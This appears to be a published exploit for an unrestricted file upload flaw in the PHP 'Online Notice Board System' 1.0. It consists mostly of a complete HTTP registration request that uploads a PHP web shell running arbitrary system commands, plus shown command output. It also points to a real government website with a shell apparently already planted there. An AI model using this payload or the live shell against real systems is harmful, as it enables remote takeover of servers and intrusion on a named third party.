# Date: 2020-08-13
# Exploit Author: Mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14317/online-notice-board-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14317&title=Online+Notice+Board+System+in+PHP+Free+Source+Code
# Version: Version 1.0
# Category: Web Application
# Tested on: Kali Linux
#Description: allows an attacker to register and upload shell file.
#Step 1: register with this link http://localhost/onbs/index.php?option=New_user
#Step 2: Enter the information like username ,email ,data and shell file
#step 3: then go to this path /onbs/images/attacker@email.com/shell.php
#example :
POST /onbs/index.php?option=New_user HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------32859291944290603147363660265
Content-Length: 1705
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onbs/index.php?option=New_user
Cookie: PHPSESSID=b7j92ccoqit6fgrbnjps3rb010
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="n"
test
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="e"
test@test.test
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="p"
test@test.test
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mob"
966555555555
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="gen"
m
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
reading
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
singin
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="hob[]"
playing
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="img"; filename="m.php"
Content-Type: application/x-php
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="yy"
1996
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="mm"
6
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="dd"
7
-----------------------------32859291944290603147363660265
Content-Disposition: form-data; name="save"
Save
-----------------------------32859291944290603147363660265--
#then you will see your shell here
#http://localhost/onbs/images/test@test.test/m.php?cmd=id
#uid=33(www-data) gid=33(www-data) groups=33(www-data)
#here website for test : http://www.sumajktccl.go.tz/onbs/
https://www.sumajktccl.go.tz/onbs/images/zx@zx.zx/re.php?cmd=id
uid=1195(sumacclgo) gid=1188(sumacclgo) groups=1188(sumacclgo)